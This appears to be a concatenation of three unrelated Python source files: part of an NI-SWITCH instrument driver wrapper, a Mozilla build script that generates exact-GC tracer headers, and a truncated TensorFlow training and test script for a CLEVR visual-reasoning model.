NISWITCH_TOPOLOGY_2525_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_OCTAL_8X1_MUX
NISWITCH_TOPOLOGY_2525_2_WIRE_SIXTEEN_4X1_MUX
NISWITCH_TOPOLOGY_2526_1_WIRE_158X1_MUX
NISWITCH_TOPOLOGY_2526_2_WIRE_79X1_MUX
NISWITCH_TOPOLOGY_2527_1_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2527_1_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2527_2_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_2527_2_WIRE_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_2527_4_WIRE_16X1_MUX
NISWITCH_TOPOLOGY_2527_INDEPENDENT
NISWITCH_TOPOLOGY_2529_2_WIRE_DUAL_4X16_MATRIX
NISWITCH_TOPOLOGY_2529_2_WIRE_8X16_MATRIX
NISWITCH_TOPOLOGY_2529_2_WIRE_4X32_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_128X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_DUAL_64X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_4x32_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_8x16_MATRIX
NISWITCH_TOPOLOGY_2530_1_WIRE_OCTAL_16X1_MUX
NISWITCH_TOPOLOGY_2530_1_WIRE_QUAD_32X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_4x16_MATRIX
NISWITCH_TOPOLOGY_2530_2_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2530_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2530_4_WIRE_32X1_MUX
NISWITCH_TOPOLOGY_2530_4_WIRE_DUAL_16X1_MUX
NISWITCH_TOPOLOGY_2530_INDEPENDENT
NISWITCH_TOPOLOGY_2531_1_WIRE_4X128_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_8X64_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_DUAL_4X64_MATRIX
NISWITCH_TOPOLOGY_2531_1_WIRE_DUAL_8X32_MATRIX
NISWITCH_TOPOLOGY_2531_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2531_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_16X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_4X128_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_8X64_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_16X16_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_4X64_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_DUAL_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_1_WIRE_SIXTEEN_2X16_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2532_2_WIRE_DUAL_4X32_MATRIX
NISWITCH_TOPOLOGY_2533_1_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2534_1_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2535_1_WIRE_4X136_MATRIX
NISWITCH_TOPOLOGY_2536_1_WIRE_8X68_MATRIX
NISWITCH_TOPOLOGY_2540_1_WIRE_8X9_MATRIX
NISWITCH_TOPOLOGY_2541_1_WIRE_8X12_MATRIX
NISWITCH_TOPOLOGY_2542_QUAD_2X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2543_DUAL_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2544_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2545_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2546_DUAL_4X1_MUX
NISWITCH_TOPOLOGY_2547_8X1_MUX NISWITCH_TOPOLOGY_2548_4_SPDT
NISWITCH_TOPOLOGY_2549_TERMINATED_2_SPDT
NISWITCH_TOPOLOGY_2554_4X1_MUX
NISWITCH_TOPOLOGY_2555_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2556_DUAL_4X1_MUX
NISWITCH_TOPOLOGY_2557_8X1_MUX NISWITCH_TOPOLOGY_2558_4_SPDT
NISWITCH_TOPOLOGY_2559_TERMINATED_2_SPDT
NISWITCH_TOPOLOGY_2564_16_SPST NISWITCH_TOPOLOGY_2564_8_DPST
NISWITCH_TOPOLOGY_2565_16_SPST NISWITCH_TOPOLOGY_2566_16_SPDT
NISWITCH_TOPOLOGY_2566_8_DPDT NISWITCH_TOPOLOGY_2567_INDEPENDENT
NISWITCH_TOPOLOGY_2568_15_DPST NISWITCH_TOPOLOGY_2568_31_SPST
NISWITCH_TOPOLOGY_2569_100_SPST NISWITCH_TOPOLOGY_2569_50_DPST
NISWITCH_TOPOLOGY_2570_20_DPDT NISWITCH_TOPOLOGY_2570_40_SPDT
NISWITCH_TOPOLOGY_2571_66_SPDT
NISWITCH_TOPOLOGY_2575_1_WIRE_196X1_MUX
NISWITCH_TOPOLOGY_2575_2_WIRE_98X1_MUX
NISWITCH_TOPOLOGY_2575_2_WIRE_95X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_64X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_DUAL_32X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_OCTAL_8X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_QUAD_16X1_MUX
NISWITCH_TOPOLOGY_2576_2_WIRE_SIXTEEN_4X1_MUX
NISWITCH_TOPOLOGY_2576_INDEPENDENT
NISWITCH_TOPOLOGY_2584_1_WIRE_12X1_MUX
NISWITCH_TOPOLOGY_2584_1_WIRE_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2584_2_WIRE_6X1_MUX
NISWITCH_TOPOLOGY_2584_INDEPENDENT
NISWITCH_TOPOLOGY_2585_1_WIRE_10X1_MUX
NISWITCH_TOPOLOGY_2586_10_SPST NISWITCH_TOPOLOGY_2586_5_DPST
NISWITCH_TOPOLOGY_2590_4X1_MUX NISWITCH_TOPOLOGY_2591_4X1_MUX
NISWITCH_TOPOLOGY_2593_16X1_MUX
NISWITCH_TOPOLOGY_2593_8X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2593_DUAL_8X1_MUX
NISWITCH_TOPOLOGY_2593_DUAL_4X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2593_INDEPENDENT NISWITCH_TOPOLOGY_2594_4X1_MUX
NISWITCH_TOPOLOGY_2595_4X1_MUX
NISWITCH_TOPOLOGY_2596_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2597_6X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2598_DUAL_TRANSFER
NISWITCH_TOPOLOGY_2599_2_SPDT NISWITCH_TOPOLOGY_2720_INDEPENDENT
NISWITCH_TOPOLOGY_2722_INDEPENDENT
NISWITCH_TOPOLOGY_2725_INDEPENDENT
NISWITCH_TOPOLOGY_2727_INDEPENDENT
NISWITCH_TOPOLOGY_2737_2_WIRE_4X64_MATRIX
NISWITCH_TOPOLOGY_2738_2_WIRE_8X32_MATRIX
NISWITCH_TOPOLOGY_2739_2_WIRE_16X16_MATRIX
NISWITCH_TOPOLOGY_2746_QUAD_4X1_MUX
NISWITCH_TOPOLOGY_2747_DUAL_8X1_MUX
NISWITCH_TOPOLOGY_2748_16X1_MUX
NISWITCH_TOPOLOGY_2790_INDEPENDENT
NISWITCH_TOPOLOGY_2796_DUAL_6X1_MUX
NISWITCH_TOPOLOGY_2797_6X1_TERMINATED_MUX
NISWITCH_TOPOLOGY_2798_DUAL_TRANSFER
NISWITCH_TOPOLOGY_2799_2_SPDT
simulate (bool): Enables simulation of the switch module specified in the resource name
parameter. Valid Values: True - simulate False - Don't simulate
(Default Value)
reset_device (bool): Specifies whether to reset the switch module during the initialization
process. Valid Values: True - Reset Device (Default Value) False
- Currently unsupported. The device will not reset.
Returns:
vi (int): A particular NI-SWITCH session established with
__init__, InitWithOptions, or init
and used for all subsequent NI-SWITCH calls.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
resource_name_ctype = ctypes.create_string_buffer(resource_name.encode(self._encoding)) # case C020
topology_ctype = ctypes.create_string_buffer(topology.encode(self._encoding)) # case C020
simulate_ctype = _visatype.ViBoolean(simulate) # case S150
reset_device_ctype = _visatype.ViBoolean(reset_device) # case S150
vi_ctype = _visatype.ViSession() # case S220
error_code = self._library.niSwitch_InitWithTopology(resource_name_ctype, topology_ctype, simulate_ctype, reset_device_ctype, None if vi_ctype is None else (ctypes.pointer(vi_ctype)))
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return int(vi_ctype.value)
@ivi_synchronized
def _initiate_scan(self):
r'''_initiate_scan
Commits the configured scan list and trigger settings to hardware and
initiates the scan. If niSwitch Commit was called earlier, niSwitch
Initiate Scan only initiates the scan and returns immediately. Once the
scanning operation begins, you cannot perform any other operation other
than GetAttribute, AbortScan, or SendSoftwareTrigger. All other
methods return NISWITCH_ERROR_SCAN_IN_PROGRESS. To stop the
scanning operation, To stop the scanning operation, call
abort.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_InitiateScan(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def relay_control(self, relay_name, relay_action):
r'''relay_control
Controls individual relays of the switch. When controlling individual
relays, the protection offered by setting the usage of source channels
and configuration channels, and by enabling or disabling analog bus
sharing on the NI SwitchBlock, does not apply. Refer to the device book
for your switch in the NI Switches Help to determine if the switch
supports individual relay control.
Args:
relay_name (str): Name of the relay. Default value: None Examples of valid relay names:
ch0, ab0, 1wire, hlselect Refer to Devices Overview for a list of valid
relay names for the switch module.
relay_action (enums.RelayAction): Specifies whether to open or close a given relay. Default value: Relay
Close Defined values: RelayAction.OPEN
RelayAction.CLOSE (Default Value)
'''
if type(relay_action) is not enums.RelayAction:
raise TypeError('Parameter mode must be of type ' + str(enums.RelayAction))
vi_ctype = _visatype.ViSession(self._vi) # case S110
relay_name_ctype = ctypes.create_string_buffer(relay_name.encode(self._encoding)) # case C020
relay_action_ctype = _visatype.ViInt32(relay_action.value) # case S130
error_code = self._library.niSwitch_RelayControl(vi_ctype, relay_name_ctype, relay_action_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def reset_with_defaults(self):
r'''reset_with_defaults
Resets the switch module and applies initial user specified settings
from the logical name used to initialize the session. If the session was
created without a logical name, this method is equivalent to
reset.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_ResetWithDefaults(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def route_scan_advanced_output(self, scan_advanced_output_connector, scan_advanced_output_bus_line, invert=False):
r'''route_scan_advanced_output
Routes the scan advanced output trigger from a trigger bus line (TTLx)
to the front or rear connector.
Args:
scan_advanced_output_connector (enums.ScanAdvancedOutput): The scan advanced trigger destination. Valid locations are the
ScanAdvancedOutput.FRONTCONNECTOR and ScanAdvancedOutput.REARCONNECTOR. Default
value: ScanAdvancedOutput.FRONTCONNECTOR
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
scan_advanced_output_bus_line (enums.ScanAdvancedOutput): The trigger line to route the scan advanced output trigger from the
front or rear connector. Select ScanAdvancedOutput.NONE to break an existing
route. Default value: None Valid Values: ScanAdvancedOutput.NONE
ScanAdvancedOutput.TTL0 ScanAdvancedOutput.TTL1 ScanAdvancedOutput.TTL2
ScanAdvancedOutput.TTL3 ScanAdvancedOutput.TTL4 ScanAdvancedOutput.TTL5
ScanAdvancedOutput.TTL6 ScanAdvancedOutput.TTL7
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
invert (bool): If True, inverts the input trigger signal from falling to rising or
vice versa. Default value: False
'''
if type(scan_advanced_output_connector) is not enums.ScanAdvancedOutput:
raise TypeError('Parameter mode must be of type ' + str(enums.ScanAdvancedOutput))
if type(scan_advanced_output_bus_line) is not enums.ScanAdvancedOutput:
raise TypeError('Parameter mode must be of type ' + str(enums.ScanAdvancedOutput))
vi_ctype = _visatype.ViSession(self._vi) # case S110
scan_advanced_output_connector_ctype = _visatype.ViInt32(scan_advanced_output_connector.value) # case S130
scan_advanced_output_bus_line_ctype = _visatype.ViInt32(scan_advanced_output_bus_line.value) # case S130
invert_ctype = _visatype.ViBoolean(invert) # case S150
error_code = self._library.niSwitch_RouteScanAdvancedOutput(vi_ctype, scan_advanced_output_connector_ctype, scan_advanced_output_bus_line_ctype, invert_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def route_trigger_input(self, trigger_input_connector, trigger_input_bus_line, invert=False):
r'''route_trigger_input
Routes the input trigger from the front or rear connector to a trigger
bus line (TTLx). To disconnect the route, call this method again and
specify None for trigger bus line parameter.
Args:
trigger_input_connector (enums.TriggerInput): The location of the input trigger source on the switch module. Valid
locations are the TriggerInput.FRONTCONNECTOR and
TriggerInput.REARCONNECTOR. Default value:
TriggerInput.FRONTCONNECTOR
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
trigger_input_bus_line (enums.TriggerInput): The trigger line to route the input trigger. Select NISWITCH_VAL_NONE
to break an existing route. Default value: None Valid Values:
NISWITCH_VAL_NONE TriggerInput.TTL0 TriggerInput.TTL1
TriggerInput.TTL2 TriggerInput.TTL3 TriggerInput.TTL4
TriggerInput.TTL5 TriggerInput.TTL6 TriggerInput.TTL7
Note:
One or more of the referenced values are not in the Python API for this driver. Enums that only define values, or represent True/False, have been removed.
invert (bool): If True, inverts the input trigger signal from falling to rising or
vice versa. Default value: False
'''
if type(trigger_input_connector) is not enums.TriggerInput:
raise TypeError('Parameter mode must be of type ' + str(enums.TriggerInput))
if type(trigger_input_bus_line) is not enums.TriggerInput:
raise TypeError('Parameter mode must be of type ' + str(enums.TriggerInput))
vi_ctype = _visatype.ViSession(self._vi) # case S110
trigger_input_connector_ctype = _visatype.ViInt32(trigger_input_connector.value) # case S130
trigger_input_bus_line_ctype = _visatype.ViInt32(trigger_input_bus_line.value) # case S130
invert_ctype = _visatype.ViBoolean(invert) # case S150
error_code = self._library.niSwitch_RouteTriggerInput(vi_ctype, trigger_input_connector_ctype, trigger_input_bus_line_ctype, invert_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def send_software_trigger(self):
r'''send_software_trigger
Sends a software trigger to the switch module specified in the NI-SWITCH
session. When the trigger input is set to TriggerInput.SOFTWARE_TRIG
through either the ConfigureScanTrigger or the
trigger_input property, the scan does not proceed from
a semi-colon (wait for trigger) until send_software_trigger is
called.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_SendSoftwareTrigger(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def set_path(self, path_list):
r'''set_path
Connects two channels by specifying an explicit path in the path list
parameter. set_path is particularly useful where path
repeatability is important, such as in calibrated signal paths. If this
is not necessary, use connect.
Args:
path_list (str): A string composed of comma-separated paths between channel 1 and channel
2. The first and last names in the path are the endpoints of the path.
Every other channel in the path are configuration channels. Example of a
valid path list string: ch0->com0, com0->ab0. In this example, com0 is a
configuration channel. Default value: None Obtain the path list for a
previously created path with get_path.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
path_list_ctype = ctypes.create_string_buffer(path_list.encode(self._encoding)) # case C020
error_code = self._library.niSwitch_SetPath(vi_ctype, path_list_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def wait_for_debounce(self, maximum_time_ms=datetime.timedelta(milliseconds=5000)):
r'''wait_for_debounce
Pauses until all created paths have settled. If the time you specify
with the Maximum Time (ms) parameter elapsed before the switch paths
have settled, this method returns the
NISWITCH_ERROR_MAX_TIME_EXCEEDED error.
Args:
maximum_time_ms (float in seconds or datetime.timedelta): Specifies the maximum length of time to wait for all relays in the
switch module to activate or deactivate. If the specified time elapses
before all relays active or deactivate, a timeout error is returned.
Default Value:5000 ms
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
maximum_time_ms_ctype = _converters.convert_timedelta_to_milliseconds(maximum_time_ms, _visatype.ViInt32) # case S140
error_code = self._library.niSwitch_WaitForDebounce(vi_ctype, maximum_time_ms_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def wait_for_scan_complete(self, maximum_time_ms=datetime.timedelta(milliseconds=5000)):
r'''wait_for_scan_complete
Pauses until the switch module stops scanning or the maximum time has
elapsed and returns a timeout error. If the time you specify with the
Maximum Time (ms) parameter elapsed before the scanning operation has
finished, this method returns the NISWITCH_ERROR_MAX_TIME_EXCEEDED
error.
Args:
maximum_time_ms (float in seconds or datetime.timedelta): Specifies the maximum length of time to wait for the switch module to
stop scanning. If the specified time elapses before the scan ends,
NISWITCH_ERROR_MAX_TIME_EXCEEDED error is returned. Default
Value:5000 ms
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
maximum_time_ms_ctype = _converters.convert_timedelta_to_milliseconds(maximum_time_ms, _visatype.ViInt32) # case S140
error_code = self._library.niSwitch_WaitForScanComplete(vi_ctype, maximum_time_ms_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
def _close(self):
r'''_close
Terminates the NI-SWITCH session and all of its properties and
deallocates any memory resources the driver uses. Notes: (1) You must
unlock the session before calling _close. (2) After calling
_close, you cannot use the instrument driver again until you
call init or InitWithOptions.
Note:
One or more of the referenced methods are not in the Python API for this driver.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_close(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def self_test(self):
'''self_test
Verifies that the driver can communicate with the switch module.
Raises `SelfTestError` on self test failure. Properties on exception object:
- code - failure code from driver
- message - status message from driver
+----------------+------------------+
| Self-Test Code | Description |
+================+==================+
| 0 | Passed self-test |
+----------------+------------------+
| 1 | Self-test failed |
+----------------+------------------+
'''
code, msg = self._self_test()
if code:
raise errors.SelfTestError(code, msg)
return None
@ivi_synchronized
def reset(self):
r'''reset
Disconnects all created paths and returns the switch module to the state
at initialization. Configuration channel and source channel settings
remain unchanged.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
error_code = self._library.niSwitch_reset(vi_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return
@ivi_synchronized
def _self_test(self):
r'''_self_test
Verifies that the driver can communicate with the switch module.
Returns:
self_test_result (int): Value returned from the switch device self-test. Passed 0 Failed 1
self_test_message (str): Self-test response string from the switch device. You must pass a ViChar
array with at least 256 bytes.
'''
vi_ctype = _visatype.ViSession(self._vi) # case S110
self_test_result_ctype = _visatype.ViInt16() # case S220
self_test_message_ctype = (_visatype.ViChar * 256)() # case C070
error_code = self._library.niSwitch_self_test(vi_ctype, None if self_test_result_ctype is None else (ctypes.pointer(self_test_result_ctype)), self_test_message_ctype)
errors.handle_error(self, error_code, ignore_warnings=False, is_error_handling=False)
return int(self_test_result_ctype.value), self_test_message_ctype.value.decode(self._encoding)
|
#!/usr/bin/env python
# -*- Mode: Python; c-basic-offset: 4; indent-tabs-mode: nil; tab-width: 4 -*-
# vi: set ts=4 sw=4 expandtab:
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
# This is a wrapper script around the exactgc script. Usage:
# Env:
# The AVM env var must point to an avmshell
# The ASC env var must point to asc.jar
# Invocation:
# The script exports one function "GenerateTracers" with these arguments:
# prefix = module specific prefix string used in generated file names, ie "avmplus", "avmglue"
# inputfiles = string of list of files, can contain wildcards
# outputdir = where output files go
import os
import shutil
import sys
import filecmp
import glob
import tempfile
import platform
import subprocess
import string
def platform_filename(filename):
filename = os.path.abspath(filename);
if sys.platform.startswith("cygwin"):
from subprocess import Popen
from subprocess import PIPE
retval = Popen(["/usr/bin/cygpath", "-m", filename], stdout=PIPE).communicate()[0]
else:
retval = filename;
return string.rstrip(retval);
utilsdir = platform_filename(os.path.dirname(__file__))
def gen(prefix,inputfiles,outputdir,srcdir=os.getcwd(),ns=''):
avm = os.environ.get('AVM')
if avm == None:
print "ERROR: AVM environment variable must point to avm executable"
exit(1)
asfile = utilsdir + "/exactgc.as"
abcfile = utilsdir + "/exactgc.abc"
# note this script tries not to rely on CWD but compiling exactgc.as does.
if not os.path.exists(abcfile) or (os.path.getmtime(abcfile) < os.path.getmtime(asfile) and os.access(abcfile, os.W_OK)):
classpath = os.environ.get('ASC')
if classpath == None:
print "ERROR: ASC environment variable must point to asc.jar"
exit(1)
print("Compiling exactgc script...")
java_home = os.environ.get('JAVA_HOME')
if java_home == None:
print "warning: no JAVA_HOME set; inferring executable is 'java' and on system path."
java_bin = 'java'
else:
java_bin = os.path.join(java_home, "bin", "java")
# "java_bin" because path may have spaces, parentheses, etc (Windows).
os.system("\"%s\" -jar %s -AS3 -import %s/../generated/builtin.abc -import %s/../generated/shell_toplevel.abc -debug %s" % (java_bin, classpath, utilsdir, utilsdir, asfile))
# in case outputdir is relative make it absolute before chdir'ing
outputdir = os.path.abspath(outputdir)
print("Generating "+prefix+" exact gc generated code into " + outputdir)
savedir = os.getcwd()
os.chdir(srcdir)
# expand wildcards in input file list
filelist = '\n'.join([y for x in map(glob.glob, inputfiles.split()) for y in x])
# don't bother trying to pass via os.system, dump into a tmp file
# for windows we need a new python API to keep the file around ater closing, which
# we must do in order for the exact gc script to open it.
oldpy = sys.version_info < (2,6)
if oldpy and platform.system() == 'Windows':
print "Error: exactgc script requirets newer python on windows."
exit(1)
if oldpy:
tmpfile = tempfile.NamedTemporaryFile()
else:
tmpfile = tempfile.NamedTemporaryFile(delete = False)
tmpfile.write(filelist)
# close deletes in old world
if not oldpy:
tmpfile.close()
else:
tmpfile.flush()
# leave off -ns arg if default namespace
if ns != '':
ns = '-ns ' + ns
exactgccmd = '%s %s -- -b %s-tracers.hh -n %s-tracers.hh -i %s-tracers.h %s %s' % (avm, abcfile, prefix, prefix, prefix, ns, '@'+platform_filename(tmpfile.name))
ret = os.system(exactgccmd)
if oldpy:
tmpfile.close()
else:
os.unlink(tmpfile.name)
success = True
if ret != 0:
print "Invoking avmshell on exactgc script failed with command:", exactgccmd
success = False
tmpfile.close()
if not os.path.exists(prefix+'-tracers.hh'):
print "Error: failed to generate tracers"
success = False
elif not os.path.exists(outputdir):
os.makedirs(outputdir)
# copy changed headers stuff to output dir
for src in [prefix+'-tracers.hh', prefix+'-tracers.h']:
target = outputdir + "/" + src
# delete target file in case of error
if not success:
if os.path.exists(target):
os.remove(target)
else:
if not os.path.exists(target) or not filecmp.cmp(target,src):
shutil.move(src,target)
else:
os.remove(src)
os.chdir(savedir)
if not success:
exit(1)
def gen_builtins(outdir):
coredir = utilsdir + "/../core/"
gen(prefix = 'avmplus', inputfiles = '*.h *.as', outputdir = outdir, srcdir = coredir, ns = 'avmplus')
def gen_shell(outdir):
shelldir = utilsdir + "/../shell/"
gen(prefix = 'avmshell', inputfiles = 'shell_toplevel.as DebugCLI.h ShellCore.h SystemClass.h', outputdir = outdir, srcdir = shelldir, ns = 'avmshell')
gen(prefix = 'extensions', inputfiles = 'DomainClass.h Domain.as ../extensions/*.h ../extensions/*.as', outputdir = outdir, srcdir = shelldir, ns = 'avmplus')
|
<reponame>rdh1115/cog
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import itertools
import os
import random
import sys
import time
import tensorflow as tf
from tensorflow.core.framework import summary_pb2
import clevr.data_generator as clevr
import clevr.constants as constants
import model.network as network
tf.app.flags.DEFINE_string(
'hparams', '', 'Comma separated list of name=value hyperparameter pairs.')
tf.app.flags.DEFINE_string(
'clevr_test_output', None,
'If set to a path, generates and write test answers for CLEVR dataset '
'into <clevr_test_output>.txt and <clevr_test_output>_with_ids.txt. '
'Test tf records are expected to be in <data_dir>. '
'Latest checkpoint is loaded from <train_dir>/checkpoints.')
# Training parameters
# task_family flag inherited from task_bank.py
tf.app.flags.DEFINE_integer('num_steps', 100000, 'number of training steps')
tf.app.flags.DEFINE_integer('display_step', 10, 'display every # steps')
tf.app.flags.DEFINE_integer('summary_step', 500, 'log summaries every # steps')
tf.app.flags.DEFINE_integer('batch_size', 250, 'batch size for training')
# Logistics
tf.app.flags.DEFINE_string('data_dir', '/tmp/clevr/tfrecord',
'Directory of training and validation data.')
tf.app.flags.DEFINE_string('train_dir', '/tmp/clevr/train',
'Directory to put the training logs.')
tf.app.flags.DEFINE_boolean('report_param_stat', False,
'If true, report parameter statistics')
FLAGS = tf.app.flags.FLAGS
def get_default_hparams_dict():
return dict(
# learning rate decay: lr multiplier per 1M examples
# value of 0.966 tranlates to 0.5 per 20M examples
lr_decay=1.0,
# learning rate
learning_rate=0.0005,
# gradient clipping
grad_clip=80.,
# clipping value for rnn state norm
rnn_state_norm_clip=5000.,
# number of core recurrent units
n_rnn=512,
# type of core rnn
rnn_type='gru',
# whether to use 128 as input image size
use_img_size_128=False,
# number of vision network output
n_out_vis=128,
# type of visual network
use_vgg_pretrain=False,
# number of units for question network
n_rnn_rule=128,
# type of rule rnn
rnn_rule_type='lstm',
# embedding size for question words
embedding_size=64,
# train initial state or not
train_init=True,
# beta1 for AdamOptimizer
adam_beta1=0.1,
# beta2 for AdamOptimizer
adam_beta2=0.0001,
# epsilon for AdamOptimizer
adam_epsilon=1e-8,
# rule network bidirectional or not
rnn_rule_bidir=True,
# number of time point to repeat for each epoch
n_time_repeat=8,
# build network with visual feature attention or not
feature_attention=True,
# state-dependent attention?
state_dep_feature_attention=False,
# whether use a MLP to generation feature attention
feature_attention_use_mlp=False,
# whether apply feature attention to the second-to-last conv layer
feature_attend_to_2conv=True,
# whether to feed a spatially-summed visual input to core
feed_space_sum_to_core=True,
# build network with visual spatial attention or not
spatial_attention=True,
# whether spatial attention depends on retrieved memory
memory_dep_spatial_attention=False,
# whether spatial attention is fed back to controller
feed_spatial_attn_back=True,
# how are rule outputs used as memory
verbal_attention=True,
# size of the query for rule memory
memory_query_size=128,
# number of maps in visual spatial memory
vis_memory_maps=0,
# only use visual memory to point short-cut
only_vis_to_pnt=True,
# optimizer to use
optimizer='adam',
# number of epochs each trial
n_epoch=1,
# signal new epoch
signal_new_epoch=False,
# final readout using a MLP
final_mlp=False,
# L2 regularization, consider a value between 1e-4 and 1e-5
l2_weight=2*1e-5,
# value 'factor' param to variance_scaling_initializer used as
# controller GRU kernel initializer
controller_gru_init_factor=1.0,
# normalize images mean 0/std 1
normalize_images=False,
)
def run_test(train_dir, test_output_dir, hparams):
print("\nRUNNING MODEL ON THE TEST SET\n")
tf.reset_default_graph()
######################### Read the data ################################
data = clevr.data_from_tfrecord(FLAGS.data_dir, 'test', batch_size=250,
hparams=hparams, is_training=False)
######################### Build the network ################################
tf.train.get_or_create_global_step()
model = network.Model(hparams, constants.config)
model.build(data, batch_size=FLAGS.batch_size, is_training=True)
model_answers = tf.argmax(model.out_word_net, -1)
true_answers = data['answer']
i_idx = data['image_index']
q_idx = data['question_index']
saver = tf.train.Saver()
######################### Build the network ################################
checkpoint_path = train_dir + '/checkpoints'
with tf.Session() as sess:
cpkt_path = tf.train.latest_checkpoint(checkpoint_path)
if cpkt_path is not None:
print("Restoring model from: " + cpkt_path)
saver.restore(sess, cpkt_path)
print("Done restoring model")
else:
raise RuntimeError("Failed to find latest checkpoint in: " +
checkpoint_path)
global_step = sess.run(tf.train.get_global_step())
print("Global step value loaded from checkpoint: " + str(global_step))
ans = {}
for i in itertools.count():
if i % 100 == 0:
print('Processing batch', i)
try:
m_ans, q_idx_ = sess.run([model_answers, q_idx])
for m, q in zip(m_ans, q_idx_):
ans[q] = constants.OUTPUTVOCABULARY[m]
except tf.errors.OutOfRangeError as e:
print("Done processing test dataset. Saving results")
break
items = ans.items()
items.sort()
with_ids = os.path.join(test_output_dir, 'clevr_test_with_ids.txt')
without_ids = os.path.join(test_output_dir, 'clevr_test.txt')
with tf.gfile.FastGFile(with_ids, 'w') as f:
f.write('\n'.join(map(lambda x: '%d %s' % x, items)))
with tf.gfile.FastGFile(without_ids, 'w') as f:
f.write('\n'.join(map(lambda x: str(x[1]), items)))
print("Results written to " + with_ids + " and " + without_ids)
def evaluate(sess, model_val, n_batches, test_writer, global_step, trial,
tuner, acc_train):
t_start = time.time()
acc_val_ = 0
loss_val_ = 0
for _ in range(n_batches):
acc_tmp, loss_tmp, = sess.run([model_val.acc, model_val.loss])
acc_val_ += acc_tmp
loss_val_ += loss_tmp
acc_val_ /= n_batches
